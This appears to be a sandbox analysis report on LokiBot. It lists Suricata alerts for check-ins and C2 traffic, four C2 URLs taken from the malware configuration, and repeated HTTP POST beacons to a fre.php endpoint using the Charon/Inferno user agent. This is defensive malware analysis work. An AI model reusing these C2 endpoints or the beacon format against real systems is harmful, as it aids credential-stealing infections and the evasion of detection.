Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49854 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49768 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49766 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49766 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49766 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49986 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49986 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49986 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49973 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49973 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49973 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49986 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49973 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49793
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49766 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49946
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49922
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49755
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49892 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49829 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49892 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49892 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49892 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49854
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49986
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49881 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49758 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49881 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49758 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49881 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49762
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49758 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49829 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49766
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49881 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49758 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49806
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49999 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49999 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49999 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49999 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50027 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50027 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50027 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50041 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50041 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50041 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49973
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50027 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50041 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49958 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49958 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49958 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49958 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50057 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50057 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50067 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50058 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50067 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50060 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50060 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50064 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50067 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50056 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50058 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50063 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50058 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50063 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49999
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50064 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50027
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50067 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50056 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50058 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50063 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50056 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50057 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50064 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50053 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50060 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50053 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50063 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50013 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50013 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50053 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50041
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50013 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50064 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50060 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50056 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50013 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50057 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50065 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49958
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50065 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50053 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49840 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50065 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49758
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49840 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49840 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50062 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50062 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50062 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50065 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49840 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50062 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50060
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49829
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50058
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50066 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50066 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50066 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50064
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50066 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50065
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50057
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50053
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50056
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50059 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50059 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50059 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50059 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50061 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50061 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50061 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50061 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50066
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50059
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50061
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50067

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 104.21.64.1 80

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1

Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
